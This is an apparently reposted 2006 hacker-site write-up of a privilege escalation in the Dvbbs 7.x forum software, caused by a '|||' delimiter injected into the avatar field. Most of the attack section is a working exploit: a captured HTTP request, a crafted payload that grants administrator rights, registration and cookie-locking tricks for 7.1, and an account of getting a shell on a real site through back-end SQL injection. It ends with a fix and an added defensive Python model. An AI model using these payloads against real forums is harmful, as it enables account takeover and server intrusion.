Dvbbs 7.x privilege escalation vulnerability - vulnerability warning - myhack58

2006-01-11T00:00:00
ID MYHACK58:6220066277
Type myhack58
Reporter Anonymous
Modified 2006-01-11T00:00:00

Description

In issue 6 of Hacker Defense (黑防) there was an article on discovering Dvbbs 7.1 vulnerabilities, which reported that the admin_postings.asp file has an injection vulnerability, but exploiting it requires super moderator or front-end administrator privileges. I remembered that I had earlier found a front-end privilege escalation vulnerability in Dvbbs 7.x, which can be combined with it. This front-end privilege escalation works on both the Access and the SQL editions of 7.x. Here we use 7.0 SP2 SQL edition to explain how the vulnerability is exploited.

Vulnerability analysis: We know that Dvbbs uses GroupID to determine the current user's group, and then uses the group's settings to determine the user's permissions. How does it obtain the GroupID? Let's look at the login verification section, around line 525 of login.asp:

Rem ========== Forum login function ==========
Rem Verify user login
Function ChkUserLogin(username,password,mobile,userCookies,ctype)
    ............ (preceding code omitted)
    SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
    SQL=SQL+" From [Dv_User] Where "&SQLstr&""
    set rsUser=DVBBS.Execute(SQL)
    If rsUser.eof and rsUser.bof Then
        ChkUserLogin=false
        Exit Function
    Else
        iMyUserInfo=rsUser.GetString(,1,"|||","","")
        rsUser.Close:Set rsUser = Nothing
    End If
    iMyUserInfo = "DVBBS|||"& Now & "|||" & Now &"|||"& DVBBS.BoardID &"|||"& iMyUserInfo &"||||||DVBBS"
    iMyUserInfo = Split(iMyUserInfo,"|||")
    If trim(password)<>trim(iMyUserInfo(6)) Then
        ChkUserLogin=false
    ElseIf iMyUserInfo(17)=1 Then
        ChkUserLogin=false
    ElseIf iMyUserInfo(19)=5 Then
        ChkUserLogin=false
    Else
        ChkUserLogin=True
        Session(DVBBS.CacheName & "UserID") = iMyUserInfo
        DVBBS.UserID = iMyUserInfo(4)
        RegName = iMyUserInfo(5)
        Article = iMyUserInfo(8)
        UserLastLogin = iMyUserInfo(15)
        UserClass = iMyUserInfo(18)
        GroupID = iMyUserInfo(19)
        TitlePic = iMyUserInfo(34)
        If Article<0 Then Article=0
    End If
    ............ (following code omitted)

As you can see, Dvbbs first joins the user's fields together with "|||" (three vertical bars) into a single string, iMyUserInfo, and then splits iMyUserInfo on "|||" into a string array.
After the user's password has been verified, the value of the 20th element of the array, iMyUserInfo(19), is assigned to GroupID. So GroupID is simply whatever value sits at the 20th position of the array: if iMyUserInfo(19) is 1, Dvbbs treats the currently logged-in user as a front-end administrator. The file Dv_ClsMain.asp in the inc directory contains a similar piece of user authentication code, used to re-check the user's permissions after the user updates their information. Dv_ClsMain.asp, around line 650:

Public Sub TrueCheckUserLogin()
    ...... (preceding code omitted)
    Dim Rs,SQL
    SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
    SQL=SQL+" From [Dv_User] Where UserID = " & UserID
    Set Rs = Execute(SQL)
    If Rs.Eof And Rs.Bof Then
        Rs.Close:Set Rs = Nothing
        UserID = 0
        EmptyCookies
        LetGuestSession()
    Else
        MyUserInfo=Rs.GetString(,1,"|||","","")
        Rs.Close:Set Rs = Nothing
        If IsArray(Session(CacheName & "UserID")) Then
            MyUserInfo = "DVBBS|||"& Now & "|||" & Session(CacheName & "UserID")(2) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
        Else
            MyUserInfo = "DVBBS|||"& Now & "|||" & DateAdd("s",-3600,Now()) &"|||"& BoardID &"|||"& MyUserInfo &"||||||DVBBS"
        End IF
        Response.Write MyUserInfo
        MyUserInfo = Split(MyUserInfo,"|||")
        ......
    End If
End Sub

'After a successful login, this function reads the user array and determines some common information
Public Sub GetCacheUserInfo()
    MyUserInfo = Session(CacheName & "UserID")
    UserID = Clng(MyUserInfo(4))
    MemberName = MyUserInfo(5)
    Lastlogin = MyUserInfo(15)
    If Not IsDate(LastLogin) Then LastLogin = Now()
    UserGroupID = Cint(MyUserInfo(19))
    ......
(the rest of the code is omitted). The two checks work in exactly the same way, so either one can be used for our purpose. Look at the SQL statement:

SQL="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday"
SQL=SQL+" From [Dv_User] Where UserID = " & UserID

UserGroupID is the 16th column. As long as some column before it contains "|||", the position of UserGroupID in the MyUserInfo string array shifts. The column we use has to meet a few requirements: its type must be suitable (not numeric); its length must be able to hold the array fragment we construct below; and it must come before UserGroupID in the SELECT above, so that the constructed data pushes UserGroupID out of its original array position. See Figure 1. Only two columns qualify, UserEmail and UserFace. Because of the IsValidEmail function we cannot insert '|' into UserEmail, so only the UserFace column remains. When basic information is modified, Dvbbs filters only a few SQL injection characters and does not filter '|', so as long as we construct the right string we can fool Dvbbs into putting us in the administrators group:

face=Dv_FilterJS(replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")

Exploitation: How do we construct UserFace to achieve our purpose? At first I thought it was enough for iMyUserInfo(19) to be 1, but that did not succeed. When constructing UserFace we also have to take into account that we have changed the structure of the iMyUserInfo array: we must make sure that the front part of the new iMyUserInfo array has exactly the same structure as the original array, otherwise there will be type conversion errors. For example, the value at UserBirthday's position in the new array must be a date. We can simply take the latter part of a normal iMyUserInfo as our UserFace value and replace the value at the UserGroupID position with 1. I modified login.asp so that it displays the current user's iMyUserInfo when the user logs in, as shown in Figure 2.

For example, admin (it does not have to be admin; any other user is fine as long as its UserGroupID is 1) has the following iMyUserInfo value at login:

DVBBS|||2005-6-19 18:05:34|||2005-6-19 18:05:34|||0|||1|||admin|||469e80d32c0559f8|||eway@aspsky.net|||4|||1|||0|||images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||administrator|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS

We can take

images/userface/image1.gif|||32|||32|||2003-12-30 16:34:00|||2005-6-19 18:04:06|||25|||0|||administrator|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS

as our UserFace value; note that this value must not exceed 255 characters. Dvbbs limits what we can submit through the form to 100 characters, so we submit with NC instead. First test on our own machine: log in to Dvbbs as an ordinary user, whose level is still "novice on the road" (新手上路). Then go to the basic-information modification page and capture the submitted packet with WSE.

The captured packet is as follows:

POST /bs/mymodify.asp?action=updat&username=4 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://210.41.235.199/bs/mymodify.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)
Host: 210.41.235.199
Content-Length: 396
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 210%2E41%2E235%2E199%2Fbs%2F=userCookies=0&StatUserID=21048347059&password=fVIy4l887ZvD956c&userhidden=&username=test&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&userid=4; upNum=0; ASPSESSIONIDASCDABTA=IEGHDLKCCHDMOBPFPFFHMNAM

title=&sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=Images%2Fuserface%2Fimage1.gif&width=32&height=32&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&userCookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&select=0&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0%C2

Now we replace the value of face with:

images/userface/image1.gif|||32|||32|||2003-12-30%2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||DVBBS

Note that the spaces in the value are replaced with %20. Recalculate the Content-Length value, then submit the request once with NC, and our user's userface is replaced. Now log in again and look. Ha ha, see? We are already the administrator. Combined with the Dvbbs 7.1 vulnerability from issue 6 of Hacker Defense, we can now add a back-end administrator.

Exploitation on Dvbbs 7.1: On version 7.1 the method changes slightly, and it is harder than on 7.0 SP2. Version 7.1 added filtering of the '|' symbol on the face variable, near line 270 of mymodify.asp:

face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")

Unfortunately for them, the Dvbbs programmer overlooked one thing: the avatar can also be set during registration, and reg.asp does not filter the face variable at all. Near line 285 of reg.asp:

If Request.form("face")<>"" Then
    face=Request.form("face")
End If

As before, capture the packet first and then submit it with NC. After registering and logging in, you are a front-end administrator. But there is one more problem, the TruePassword. 7.1 strengthened its protection against cookie spoofing, so this truepassword changes very frequently. In 7.0 SP2, newpass.asp contains only a single statement that updates the current user's truepassword. 7.0 SP2 newpass.asp file:

<% DVBBS.NewPassword0() %>

In 7.1, newpass.asp also checks whether the user's cookies have been updated. 7.1 newpass.asp, around line 30:

'Check whether the write succeeded; if so, update the data
If DVBBS.checkStr(Trim(Request.Cookies(DVBBS.Forum_sn)("password")))=TruePassWord Then
    DVBBS.Execute("UpDate [Dv_user] Set TruePassWord='"&TruePassWord&"' where UserID="&DVBBS.UserID)
    DVBBS.MemberWord = TruePassWord
    Dim iUserInfo
    iUserInfo = Session(DVBBS.CacheName & "UserID")
    iUserInfo(35) = TruePassWord
    Session(DVBBS.CacheName & "UserID") = iUserInfo
End If

In 7.1, the truepassword in our client-side cookies is updated to the new truepassword, but the server-side truepassword comes from MyUserInfo, and the truepassword value inside MyUserInfo does not change, so the check turns into an endless loop. Our solution is cookie locking: with the Guilin Veteran (桂林老兵) browser, set the truepassword value in our cookies to the same value as the truepassword in MyUserInfo and then lock the cookies, so that newpass.asp is not requested over and over in an infinite loop. Since I do not have the code of the 7.1 SQL edition at hand, the above was tested on the 7.1 Access edition, where you can successfully become a front-end administrator.

Postscript. Prevention: modifying the database structure would be a big project, so it is recommended to add filtering of the "|" character to the corresponding variables in reg.asp and mymodify.asp, for example:

face=Dv_FilterJS(Replace(face,"'",""))
face=Replace(face,"..","")
face=Replace(face,"\","/")
face=Replace(face,"^","")
face=Replace(face,"#","")
face=Replace(face,"%","")
face=Replace(face,"|","")
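As an added example that is not part of the original article or of the Dvbbs code base, the following Python models the "|||"-joined record that both login.asp and Dv_ClsMain.asp rely on, and contrasts the positional parse with the two defences the analysis above implies: filtering '|' on input, as the postscript recommends, and rejecting any record whose field count no longer matches the column list (plus a sweep that flags stored rows already carrying the delimiter). The constant names, the sample rows and the column list truncated after UserGroup are this example's own assumptions.

```python
# Added example (not code from the article or from Dvbbs): a Python model of the
# "|||"-joined user record that login.asp and Dv_ClsMain.asp build, showing why a
# delimiter inside UserFace moves UserGroupID, plus the defender-side fixes:
# strip '|' on input (the article's recommendation) and validate the field count
# before trusting a positional index. Column list is truncated after UserGroup.
SEP = "|||"
COLUMNS = ["UserID", "UserName", "UserPassword", "UserEmail", "UserPost",
           "UserTopic", "UserSex", "UserFace", "UserWidth", "UserHeight",
           "JoinDate", "LastLogin", "UserLogins", "Lockuser", "Userclass",
           "UserGroupID", "UserGroup"]
HEADER_FIELDS = 4                                            # "DVBBS", Now, Now, BoardID
GROUP_INDEX = HEADER_FIELDS + COLUMNS.index("UserGroupID")   # 19, as in iMyUserInfo(19)
EXPECTED_FIELDS = HEADER_FIELDS + len(COLUMNS) + 2           # "||||||DVBBS" adds 2 fields


def build_user_info(row):
    """Mimics rsUser.GetString(,1,"|||","","") plus the DVBBS|||...||||||DVBBS framing."""
    body = SEP.join(str(row[c]) for c in COLUMNS)
    return SEP.join(["DVBBS", "now", "now", "0", body, "", "DVBBS"])


def group_id_vulnerable(user_info):
    """Original behaviour: Split(..., "|||") and then trust a fixed index."""
    return user_info.split(SEP)[GROUP_INDEX]


def group_id_checked(user_info):
    """Hardened parse: a record whose field count does not match the schema is rejected."""
    fields = user_info.split(SEP)
    if len(fields) != EXPECTED_FIELDS:
        raise ValueError("field count %d != %d: delimiter inside a column"
                         % (len(fields), EXPECTED_FIELDS))
    return fields[GROUP_INDEX]


def sanitize_face(face):
    """Input-side fix the article recommends for reg.asp and mymodify.asp."""
    return face.replace("|", "")


def tainted_users(rows):
    """Detection sweep over stored Dv_User rows: any text column containing '|' is suspect."""
    return [r["UserID"] for r in rows
            if any(isinstance(r[c], str) and "|" in r[c] for c in COLUMNS)]
```

The field-count check catches a shifted record on read regardless of which column carried the delimiter, which is why it belongs beside the input filter rather than instead of it.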

One more thing worth mentioning: Dvbbs trusts back-end administrators too much, so many places in the back end have no protection against SQL injection, which practically hands us SQL injection. We once tested a website that was locked down very tightly. It ran Dvbbs. When we obtained Dvbbs back-end administrator privileges we found that the upload directory had no execute permission, so an asp trojan uploaded there came straight back as plain content, and the directories with asp execute permission had no write permission. There were no other injectable sites on that server either. In the end it was only through injection in the Dvbbs back end that I got a small shell. Truly, a dike of a thousand miles collapses from an ant hole. In short, this privilege escalation vulnerability requires no great skill, but its consequences are very serious. Because multiple front-end management pages have SQL injection, this vulnerability is very harmful to the DVBBS 7.x SQL editions. Please do not use this method to do destructive things; you bear the consequences yourself.